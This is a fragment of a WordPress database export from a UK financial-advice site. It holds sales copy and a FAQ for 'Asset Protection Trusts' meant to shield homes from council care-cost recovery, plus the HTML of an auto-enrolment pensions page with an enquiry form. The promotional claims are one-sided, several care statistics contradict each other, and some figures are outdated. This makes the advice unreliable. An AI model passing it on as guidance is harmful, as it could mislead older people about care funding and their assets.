empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\",\"mobile_nav_cart\":\"Shopping Cart\",\"page_smoothHeight\":\"false\",\"flex_smoothHeight\":\"false\",\"language_flag\":\"ICL_LANGUAGE_CODE\",\"infinte_blog_finished_msg\":\"<em>All posts displayed</em>\",\"infinite_blog_text\":\"<em>Loading the next set of posts...</em>\",\"portfolio_loading_text\":\"<em>Loading Portfolio Items...</em>\",\"faqs_loading_text\":\"<em>Loading FAQ Items...</em>\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/main.js\"/></body>','&#13;	Asset Protection Trust','Why asset protection trusts matter. 1 in 4 women & 1 in 6 men over 65 will go into care. And the Council can take all your assets to pay for it.','publish','closed','closed','','asset-protection-trust','','','2017-09-21 16:47:17','2017-09-21 16:47:17','',0,'http://www.equalitywalk.org.uk/asset-protection-trust',0,'post','',0),(49,1,'2017-09-21 16:34:26','2017-09-21 16:34:26','And that the Council can take all your assets — including your house — to pay for the care? Only the last £14,500 is protected!\r\n\r\nSo just think what you could lose!\r\n<h4>You have 3 options:-</h4>\r\n<ol>\r\n<ol>\r\n 	<li>You could do nothing and hope for the best. This is not what we would recommend.</li>\r\n</ol>\r\n</ol>\r\n<ol>\r\n<ol>\r\n 	<li>You could transfer your assets to your family. By doing this you may protect your assets but you lose control. There are many things that can go wrong with this; your family may have to pay Capital Gains Tax on the asset, they may get divorced or go bankrupt, or simply fall out. Again, we don’t recommend this.</li>\r\n</ol>\r\n</ol>\r\n<ol>\r\n<ol>\r\n 	<li>Or you could transfer your assets including your house into an <em>Asset Protection Trust</em>. This allows you to have total control over your assets and helps protects them.</li>\r\n</ol>\r\n</ol>\r\nTo find out more about Asset Protection Trusts and to get the advice you need, please either call us on the telephone number above or complete our quick enquiry form below, and we’ll call you straight back to help you with your investment questions.\r\n\r\nWe are ready for your call.\r\n\r\nHow are your Assets considered for Long Term Care?\r\n<ul>\r\n<ul>\r\n 	<li>A Doctor, in conjunction with the family, will decide whether you need long term care.</li>\r\n</ul>\r\n</ul>\r\n<ul>\r\n<ul>\r\n 	<li>If you need nursing care, the Council must arrange for the care and they must pay for it.</li>\r\n</ul>\r\n</ul>\r\n<ul>\r\n<ul>\r\n 	<li>The council has the right to try and recover these costs and they may try to do this. It is more difficult for them to recover costs as the assets are no longer in your name, but in the name of the Trust. The Solicitor Trustees will always deal with the Local Authority and respond to any challenge. The CRAG Report (Charges for Residential Accommodation Guide) states that ‘it would be unreasonable to decide that deliberate deprivation had taken place if the deposit took place when the claimant was fit and healthy and could not have foreseen the need to move into residential accommodation’. Therefore the sooner a Trust is set up the better.</li>\r\n</ul>\r\n</ul>\r\n<ul>\r\n<ul>\r\n 	<li>The Council will fund your care up to their maximum funding rate but the Care Homes normally settle for this amount instead of demanding the private rate.</li>\r\n</ul>\r\n</ul>\r\nApart from care costs, the Asset Protection Trust has other big advantages. It will avoid Executory procedure on your death and save money. If most of your assets are in the trust then there will be no Executory Costs and your estate can be paid over to your beneficiaries without delay, usually within a couple of weeks. On death, estates normally cannot be paid out within the first 6 months, and can take up to two years to complete. Assets in a Trust are paid out immediately.\r\n\r\nEven if you have a mortgage on your property which you do not want to pay off, then we can, in some cases, still set up a Assets Protection Trust, as long as the lender agrees.\r\n\r\n\r\n\r\n<strong>Some commonly asked questions:</strong>\r\n\r\nWhy is it important? - If the time comes when you do need to go into care, you may find that the assets like your home that’s taken a lifetime to accumulate, can be used for the cost of care rather than going directly to your beneficiaries.\r\n\r\nMy family will take of me - Lots of things can change in your lifetime – we are seeing more children become dependent on their parents again due to the economic climate – it may never happen but the current fact speak for themselves that 1 in 4 men and 1 in 3 women unfortunately have to go into care when they are over 65.\r\n\r\nWill I get any benefit from it? - Like all things in life it is about making a plan for the eventuality – if the result can save you a significant sum in care costs then it is obviously worth it. Saving on expensive legal probate costs will be of value also.\r\n\r\nWhat if I don’t go into care? - Winding up your estate can be costly and time consuming so you will see the benefit by avoiding the in the costs and difficulty involved, in winding up your estate. A solicitor needs appointed when you die to carry out the necessary executory work particularly if the house is in your name and can be expensive. However if you have taken the right steps and you have appointed you home to the Trust then you will find that the Trustees can complete things quickly and efficiently on your behalf.\r\n\r\nWhat is the Solicitors role? - Keeping control as a Trustee will be important for you, so if you need to make any key changes or decisions about the Trust your appointed solicitor will always be on your side providing more peace of mind that you can’t be outvoted.\r\n\r\nI have heard that you need two Solicitors – is this true? - If you’re Will leaves your estate to more or one beneficiaries then it is important that there are two Solicitors as Trustees, to outvote the remaining family member Trustee. Otherwise he could take control. With two Solicitors this ensures that what you want to happen after your death will actually happen.\r\n\r\nCan I trust the Solicitors? - Solicitors have a duty of care and are bound by the laws of their profession by The Law Society in England and Wales and also The Law Society of Scotland and they cannot benefit from the Trust directly as named beneficiaries.\r\n\r\nWhat are the ongoing fees and costs? - There are NO ongoing fees. With this scheme you pay the fee to set up the Trust at the outset and have nothing further to pay unless you go into care and there is a dispute with the Council, which is very rare.\r\n\r\nWhat kinds of assets can be placed in the Trust? - You are not means tested by the local authority on any capital up to £14500 and is ignored  – you will tend to look first at other assets like your house, we will advice you on what would be best suited to being allocated to your Trust.\r\n\r\nCan other assets be added at a later date? - You can, as assets can be placed in the trust at a later although, this will start the 6 month clock ticking on  that particular asset.\r\n\r\nIs there any limit on the value of assets placed with the Trust? - The Asset Protection Trust will usually hold assets up to the value of the current Nil Rate Band (£325,000 for the tax year 2010/11) for each client, as any assets in excess of this would create an immediate charge to lifetime Inheritance Tax of 40%. There are however a number of other options to safeguard your assets if 2 Trusts do not cover your entire estate.\r\n\r\n<img class=\"size-medium wp-image-289 alignleft\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/IMG_1113-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />When is the best time to set up the Trust? - We would recommend as quickly as possible after you have considered all you options. You will always be under scrutiny from Local Authorities to look back and  review the circumstances in which a Family Protection Trust was set up at any time. You will have less to worry about if it was apparent  you had expectation in entering long term care.\r\n\r\n<strong>Can I change my mind? - You have control so if anything changes you will have the choice for everything to revert to the way it was in your name only.</strong>\r\n\r\nCan I move house? - Yes, since you control the Trust you can move house in the usual way except that the deeds are signed by all the Trustees rather than by you alone; but that makes no difference.\r\n\r\nWhat happens if one of us dies? - Nothing. The Trust, and the protection that is provides, simply continues as before until the second person dies. The survivor continues to retain control of the Trust.\r\n\r\nWhat happens if one of us becomes incapacitated? - Nothing. The remaining Trustees simply continue as before. We also prepare Powers of Attorney as part of this process to allow this to happen. Otherwise without this arrangement, the family may have to go to Court to obtain a Guardianship Order which can be a very difficult and expensive process.\r\n\r\n\r\n<h3>What happens if one of the other Trustees die? - A new Trustee is simply assumed in their place.</h3>\r\nWho gets my estate when I die? - You will decide you your named beneficiaries are in your Will and letter of wishes. The Trustees will then look to execute your wishes in a timely fashion. Having two Solicitor Trustees ensures this happens quickly and efficiently.\r\n\r\nDo I need a Will then? - Yes, Wills are extremely important. Any estate which is in your name when you die will be dealt with according to the terms of your Will, assuming the class of beneficiaries names remains the same. We will discuss this with you when setting up the trust.','Asset Protection','Did you know that 1 in 3 women & 1 in 4 men over 65 will go into care? And the Council can take all your assets - including your house - to pay for it?','publish','closed','closed','','asset-protection','','','2017-09-21 17:11:40','2017-09-21 17:11:40','',79,'http://www.equalitywalk.org.uk/asset-protection',0,'page','',0),(50,1,'2017-09-21 16:34:26','2017-09-21 16:34:26','<body class=\"page page-id-134 page-child parent-pageid-25 page-template page-template-100-width-php light  wpb-js-composer js-comp-ver-3.5.4 vc_responsive\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n					<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v2\">&#13;\n		&#13;\n		<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul id=\"nav\" class=\"menu\"><li id=\"menu-item-7214\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7214\"><a href=\"/wealth-management\">Wealth Management</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44\"><a href=\"/wealth-platform\">Wealth Platform</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-page-ancestor current-menu-ancestor current-menu-parent current-page-parent current_page_parent current_page_ancestor menu-item-has-children menu-item-27\"><a href=\"/pensions\">Pensions</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-967\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-967\"><a href=\"/pensions/pension-release\">Pension Release</a></li>&#13;\n	<li id=\"menu-item-741\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-741\"><a href=\"/pensions/pension-transfer\">Pension Transfer</a></li>&#13;\n	<li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-menu-item page_item page-item-134 current_page_item menu-item-has-children menu-item-136\"><a href=\"/pensions/auto-enrolment-pensions\">Auto Enrolment Pensions</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6494\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6494\"><a href=\"/auto-enrolment-report\">Auto Enrolment Report</a></li>&#13;\n	</ul></li>&#13;\n	<li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"/pension-review\">Pension Review</a></li>&#13;\n	<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"/pensions/sipps\">SIPPS</a></li>&#13;\n	<li id=\"menu-item-105\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-105\"><a href=\"/pensions/stakeholder-pensions\">Stakeholder Pensions</a></li>&#13;\n	<li id=\"menu-item-127\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-127\"><a href=\"/pensions/occupational-pensions\">Occupational Pensions</a></li>&#13;\n	<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"/pensions/group-pension-plan\">Group Pension Plan</a></li>&#13;\n	<li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"/pensions/income-drawdown\">Income Drawdown</a></li>&#13;\n	<li id=\"menu-item-6852\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-6852\"><a>More Information</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6848\"><a href=\"/tracking-down-your-lost-pension\">Lost Pension</a></li>&#13;\n	</ul></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-47\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-47\"><a href=\"/investments\">Investments</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-121\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-121\"><a href=\"isas\">ISAs</a></li>&#13;\n	<li id=\"menu-item-118\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-118\"><a href=\"lump-sum-investment\">Lump Sum Investment</a></li>&#13;\n	<li id=\"menu-item-102\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-102\"><a href=\"offshore-bonds\">Offshore Bonds</a></li>&#13;\n	<li id=\"menu-item-124\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-124\"><a href=\"unit-trusts-oeics\">Unit Trusts &amp; OEICs</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-46\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-46\"><a href=\"/trusts\">Trusts</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-108\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-108\"><a href=\"/asset-protection-trust\">Asset Protection Trust</a></li>&#13;\n	<li id=\"menu-item-114\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-114\"><a href=\"/discretionary-trusts\">Discretionary Trusts</a></li>&#13;\n	<li id=\"menu-item-115\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-115\"><a href=\"/absolute-trusts\">Absolute Trusts</a></li>&#13;\n	<li id=\"menu-item-143\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-143\"><a href=\"/gift-loan-schemes\">Gift &amp; Loan Trust</a></li>&#13;\n	<li id=\"menu-item-146\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-146\"><a href=\"/wills-and-trust\">Wills and Trust</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-3381\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-3381\"><a href=\"/insurance-protection\">Insurance</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-3535\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3535\"><a href=\"/critical-illness-insurance-2-0\">Critical Illness</a></li>&#13;\n	<li id=\"menu-item-3585\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3585\"><a href=\"/serious-illness-cover\">Serious Illness</a></li>&#13;\n	<li id=\"menu-item-4633\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4633\"><a href=\"/relevant-life-plan\">Relevant Life Plan</a></li>&#13;\n	<li id=\"menu-item-7228\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7228\"><a href=\"/life-insurance\">Life Insurance</a></li>&#13;\n	<li id=\"menu-item-7243\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7243\"><a href=\"/business-protection-insurance\">Business Protection</a></li>&#13;\n</ul></li>&#13;\n		</ul></nav></div>&#13;\n	</header></div>		</div>&#13;\n				<div id=\"sliders-container\">&#13;\n									</div>&#13;\n																<div id=\"main\" class=\"width-100\" style=\"overflow:hidden !important;padding-left:0px;padding-right:0px;\">&#13;\n		<div class=\"avada-row\" style=\"max-width:100%;\">&#13;\n				<div id=\"content\" class=\"full-width\">&#13;\n				<div id=\"post-134\" class=\"post-134 page type-page status-publish hentry\">&#13;\n			<span class=\"entry-title\" style=\"display: none;\">Auto Enrolment Pensions</span>&#13;\n			<span class=\"updated\" style=\"display: none;\"/>&#13;\n			<span class=\"vcard\" style=\"display: none;\"><span class=\"fn\"><a href=\"/author/rs-r-admin\" title=\"Posts by Equity SMART\" rel=\"author\">Equity SMART</a></span></span>&#13;\n						<div class=\"post-content\">&#13;\n				<div class=\"fullwidth-box\" style=\"background-color:;background-image:url(/wp-content/uploads/2013/09/new-image.jpg);background-repeat:no-repeat;background-position:top left;background-attachment:fixed;border-top:0px solid ;border-bottom:0px solid ;padding-top:30px;padding-bottom:10px;-webkit-background-size: cover;-moz-background-size: cover;-o-background-size: cover;background-size: cover;\"><div class=\"avada-row\">&#13;\n<h1 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: xx-large;\">We Reduce Complexity, Minimise Business Risks &amp; Provide Cost Effective Auto Enrolment Solutions.</span></h1>&#13;\n<p style=\"text-align: center;\"><span style=\"font-size: large; color: #ffffff;\">Our team guide employers of all sizes seamlessly through the new legislation, taking you on a clear path to a fully compliant workplace pension scheme.</span></p>&#13;\n<p style=\"text-align: center;\"><a class=\"button large green\" href=\"/contact-us\" target=\"_blank\">Request A FREE Consultation</a>&#13;\n</p><p style=\"text-align: center;\"/><div class=\"demo-sep sep-none\" style=\"margin-top:80px;\"/>&#13;\n<div class=\"one_third\">&#13;\n<p><span style=\"font-size: large;\"><span style=\"color: #ff9900;\">MORE CONTACT.</span></span></p>&#13;\n<p><span style=\"color: #c0c0c0;\"><span style=\"color: #ffffff;\">You’ll have two named contacts in the financial advisory team, a workplace pensions expert to advise you and a client manager to support you, so we’ll always be right there when you need us</span>.<br/></span></p>&#13;\n<p/></div><div class=\"one_third\">&#13;\n<p><span style=\"font-size: large;\"><span style=\"color: #ff9900;\">INDEPENDENT.</span></span></p>&#13;\n<p><span style=\"color: #ffffff;\">We share an unwavering belief that independent and impartial advice can best deliver what you expect and deserve in a workplace pension, our loyalties therefore lie with our clients.</span></p>&#13;\n<p/></div><div class=\"one_third last\">&#13;\n<p><span style=\"font-size: large;\"><span style=\"color: #ff9900;\">FULL SERVICE.</span></span></p>&#13;\n<p><span style=\"color: #ffffff;\">We look at all aspects of Auto Enrolment on your business, both the financial &amp; operational, and the  technology &amp; payroll, and we advise on all aspects of starting, growing and maintaining a pension scheme.</span></p>&#13;\n</div><div class=\"clearboth\"/>&#13;\n<p style=\"text-align: left;\"/></div></div>&#13;\n<p style=\"text-align: center;\"/><div class=\"fullwidth-box\" style=\"background-color:;background-image:url();background-repeat:no-repeat;background-position:top left;background-attachment:scroll;border-top:0px solid ;border-bottom:0px solid ;padding-top:0px;padding-bottom:0px;-webkit-background-size: cover;-moz-background-size: cover;-o-background-size: cover;background-size: cover;\"><div class=\"avada-row\">&#13;\n<p style=\"text-align: center;\"><span><div class=\"one_half\">&#13;\n<p style=\"text-align: left;\">We help busy executives, business owners and their project teams meet the new regulatory pension requirements, through simple, straight forward independent advice that will save you time, effort and expense.</p>&#13;\n<p><span>We provide you with financial peace of mind by taking a realistic and complete approach to Auto Enrolment through pensions expertise built on prudence and sound judgement. </span></p>&#13;\n<p><span>We look look to ensure your business continues to be efficient, profitable and have the minimum of disruption on you and your people by providing an action plan that is clear, actionable and aims to show you what you need to do and by when.</span></p>&#13;\n<p><span>If your looking for help from workplace pension experts with an established track record in helping get your business positioned on time and on  budget – your in the right place.</span></p>&#13;\n<p><span>Our Initial free assessment will provide:</span></p>&#13;\n<style type=\"text/css\"><![CDATA[\r\n	.post-content #checklist-1 li:before{color:light !important; content:\'f046\' }\r\n	.rtl .post-content #checklist-1 li:after{color:light !important; content:\'f046\' }\r\n	]]></style><ul id=\"checklist-1\" class=\"list-icon circle-yes list-icon-check\"><li>Jargon free independent auto enrolment pensions advice. That means we have no affiliation with any other business that could influence our assessment of your pension options.</li>&#13;\n<li>A quick &amp; accurate analysis. This will determine if your current pension arrangement (if you have one) complies with Auto Enrolment.</li>&#13;\n<li>A clear  understanding of any additional administration and costs involved and show you if your existing payroll process needs to be altered.</li>&#13;\n</ul></div>&#13;\n<div class=\"one_half last\">&#13;\n<div id=\"iphorm-outer-52fe0ecf2f887\" class=\"iphorm-outer iphorm-outer-10 iphorm-uniform-theme-default iphorm-theme-light-rounded\">&#13;\n    <script type=\"text/javascript\"><![CDATA[\r\n	<!--\r\n		    jQuery(document).ready(function($) {\r\n			\r\n        	$(\'#iphorm-52fe0ecf2f887\').iPhorm({\"id\":10,\"uniqueId\":\"52fe0ecf2f887\",\"PHPSESSID\":\"880636e488e3ab897302c17a0a522dfa\",\"useAjax\":true,\"successMessageTimeout\":10,\"clElementIds\":[],\"clDependentElementIds\":[],\"centerFancybox\":true,\"centerFancyboxSpeed\":true});\r\n\r\n	        	        if ($.isFunction($.fn.qtip)) {\r\n	            $(\'.iphorm-tooltip-hover\', iPhorm.instance.$form).qtip({\r\n	                style: {\r\n	                    classes: \'qtip-plain qtip-shadow qtip-rounded\'\r\n	                },\r\n	                position: {\r\n	                    my: \'left center\',\r\n	                    at: \'right center\'\r\n	                }\r\n	            });\r\n	            $(\'.iphorm-tooltip-click\', iPhorm.instance.$form).qtip({\r\n	                style: {\r\n	                    classes: \'qtip-plain qtip-shadow qtip-rounded\'\r\n	                },\r\n	                position: {\r\n	                    my: \'left center\',\r\n	                    at: \'right center\'\r\n	                },\r\n	                show: {\r\n	                    event: \'focus\'\r\n	                },\r\n	                hide: {\r\n	                    event: \'unfocus\'\r\n	                }\r\n	            });\r\n	            $(\'.iphorm-tooltip-icon-hover\', iPhorm.instance.$form).qtip({\r\n	                style: {\r\n	                    classes: \'qtip-plain qtip-shadow qtip-rounded\'\r\n	                },\r\n	                position: {\r\n	                    my: \'left center\',\r\n	                    at: \'right center\'\r\n	                },\r\n	                content: {\r\n	                    text: function (api) {\r\n	                        return $(this).find(\'.iphorm-tooltip-icon-content\')();\r\n	                    }\r\n	                }\r\n	            });\r\n	            $(\'.iphorm-tooltip-icon-click\', iPhorm.instance.$form).qtip({\r\n	                style: {\r\n	                    classes: \'qtip-plain qtip-shadow qtip-rounded\'\r\n	                },\r\n	                position: {\r\n	                    my: \'left center\',\r\n	                    at: \'right center\'\r\n	                },\r\n	                show: {\r\n	                    event: \'click\'\r\n	                },\r\n	                hide: {\r\n	                    event: \'unfocus\'\r\n	                },\r\n	                content: {\r\n	                    text: function (api) {\r\n	                        return $(this).find(\'.iphorm-tooltip-icon-content\')();\r\n	                    }\r\n	                }\r\n	            });\r\n	            $(\'.iphorm-labels-inside > .iphorm-element-spacer > label\').hover(function () {\r\n	                $(this).siblings(\'.iphorm-input-wrap\').find(\'.iphorm-tooltip-hover\').qtip(\'show\');\r\n	            }, function () {\r\n	            	$(this).siblings(\'.iphorm-input-wrap\').find(\'.iphorm-tooltip-hover\').qtip(\'hide\');\r\n	            });\r\n	        }\r\n	        \r\n	        	        if ($.isFunction($.fn.uniform)) {\r\n	            $(\'select, input:checkbox, input:radio\', iPhorm.instance.$form).uniform({context: iPhorm.instance.$form, selectAutoWidth: false});\r\n	        }\r\n	        \r\n	        if ($.isFunction($.fn.inFieldLabels)) {\r\n	            $(\'.iphorm-labels-inside:not(.iphorm-element-wrap-recaptcha) > .iphorm-element-spacer > label\', iPhorm.instance.$form).inFieldLabels();\r\n	        }\r\n\r\n	        \r\n	        $(\'.iphorm-group-row > div:last-child:not(:first-child)\', iPhorm.instance.$form).add(\'.iphorm-group-row:last-child\', iPhorm.instance.$form).addClass(\'last-child\');\r\n\r\n	        	    }); // end document.ready()\r\n	//-->\r\n	]]></script><form id=\"iphorm-52fe0ecf2f887\" class=\"iphorm iphorm-form-10\" action=\"../../pensions/auto-enrolment-pensions/\" method=\"post\" enctype=\"multipart/form-data\">&#13;\n        <div class=\"iphorm-inner iphorm-inner-10\" style=\"background-color: rgb(222, 240, 218);padding-top: 25px;padding-bottom: 25px;padding-right: 20px;padding-left: 20px;\">&#13;\n            <input type=\"hidden\" name=\"iphorm_id\" value=\"10\"/><input type=\"hidden\" name=\"iphorm_uid\" value=\"52fe0ecf2f887\"/><input type=\"hidden\" name=\"form_url\" value=\"http://www.equalitywalk.org.uk/pensions/auto-enrolment-pensions/\"/><input type=\"hidden\" name=\"referring_url\" value=\"\"/><input type=\"hidden\" name=\"post_id\" value=\"134\"/><input type=\"hidden\" name=\"post_title\" value=\"Auto Enrolment Pensions\"/><h3 class=\"iphorm-title\" style=\"color: rgb(0, 0, 0);font: antic slab;font-size: xx-large;\">Advice That Makes A Real Difference&#13;\n                                        </h3><p class=\"iphorm-description\" style=\"font-size: 15px;\">Fill out our simple form to request a call back from one our workplace pensions experts</p>&#13;\n                                    	            		<div class=\"iphorm-success-message iphorm-hidden\"/>&#13;\n            	                        <div class=\"iphorm-elements iphorm-elements-10 iphorm-clearfix\">&#13;\n                <div class=\"iphorm-group-wrap iphorm_10_9-group-wrap iphorm-clearfix iphorm-labels-inside iphorm-group-style-plain iphorm-group-alignment-proportional\">&#13;\n    <div class=\"iphorm-group-elements\">&#13;\n                <div class=\"iphorm-group-row iphorm-clearfix iphorm-group-row-2cols\"><div class=\"iphorm-element-wrap iphorm-element-wrap-text iphorm_10_1-element-wrap iphorm-clearfix iphorm-labels-inside iphorm-element-required\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-text iphorm_10_1-element-spacer\">&#13;\n                    <label for=\"iphorm_10_1_52fe0ecf2f887\" style=\"color: rgb(0, 0, 0);font: 15px antic slab;\">&#13;\n                Name                                    <span class=\"iphorm-required\">(required)</span>&#13;\n                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-text iphorm_10_1-input-wrap\">&#13;\n            <input class=\"iphorm-element-text  iphorm_10_1\" id=\"iphorm_10_1_52fe0ecf2f887\" type=\"text\" name=\"iphorm_10_1\" value=\"\" style=\"background-color: rgb(255, 255, 255);color: rgb(0, 0, 0);\"/></div>&#13;\n        <div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n    </div><div class=\"iphorm-element-wrap iphorm-element-wrap-text iphorm_10_11-element-wrap iphorm-clearfix iphorm-labels-inside iphorm-element-optional\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-text iphorm_10_11-element-spacer\">&#13;\n                    <label for=\"iphorm_10_11_52fe0ecf2f887\" style=\"color: rgb(0, 0, 0);font: 15px antic slab;\">&#13;\n                Company Name                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-text iphorm_10_11-input-wrap\">&#13;\n            <input class=\"iphorm-element-text  iphorm_10_11\" id=\"iphorm_10_11_52fe0ecf2f887\" type=\"text\" name=\"iphorm_10_11\" value=\"\" style=\"background-color: rgb(255, 255, 255);color: rgb(0, 0, 0);\"/></div>&#13;\n        <div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n    </div></div><div class=\"iphorm-group-row iphorm-clearfix iphorm-group-row-2cols\"><div class=\"iphorm-element-wrap iphorm-element-wrap-text iphorm_10_3-element-wrap iphorm-clearfix iphorm-labels-inside iphorm-element-required\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-text iphorm_10_3-element-spacer\">&#13;\n                    <label for=\"iphorm_10_3_52fe0ecf2f887\" style=\"color: rgb(0, 0, 0);font: 15px antic slab;\">&#13;\n                Email address                                    <span class=\"iphorm-required\">(required)</span>&#13;\n                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-text iphorm_10_3-input-wrap\">&#13;\n            <input class=\"iphorm-element-text  iphorm_10_3\" id=\"iphorm_10_3_52fe0ecf2f887\" type=\"text\" name=\"iphorm_10_3\" value=\"\" style=\"background-color: rgb(255, 255, 255);color: rgb(0, 0, 0);\"/></div>&#13;\n        <div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n    </div><div class=\"iphorm-element-wrap iphorm-element-wrap-text iphorm_10_4-element-wrap iphorm-clearfix iphorm-labels-inside iphorm-element-required\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-text iphorm_10_4-element-spacer\">&#13;\n                    <label for=\"iphorm_10_4_52fe0ecf2f887\" style=\"color: rgb(0, 0, 0);font: 15px antic slab;\">&#13;\n                Telephone                                    <span class=\"iphorm-required\">(required)</span>&#13;\n                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-text iphorm_10_4-input-wrap\">&#13;\n            <input class=\"iphorm-element-text  iphorm_10_4\" id=\"iphorm_10_4_52fe0ecf2f887\" type=\"text\" name=\"iphorm_10_4\" value=\"\" style=\"background-color: rgb(255, 255, 255);color: rgb(0, 0, 0);\"/></div>&#13;\n        <div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n    </div>        </div> <!-- /.iphorm-group-row -->&#13;\n    </div> <!-- /.iphorm-group-elements -->&#13;\n</div> <!-- /.iphorm-group-wrap --><div class=\"iphorm-element-wrap 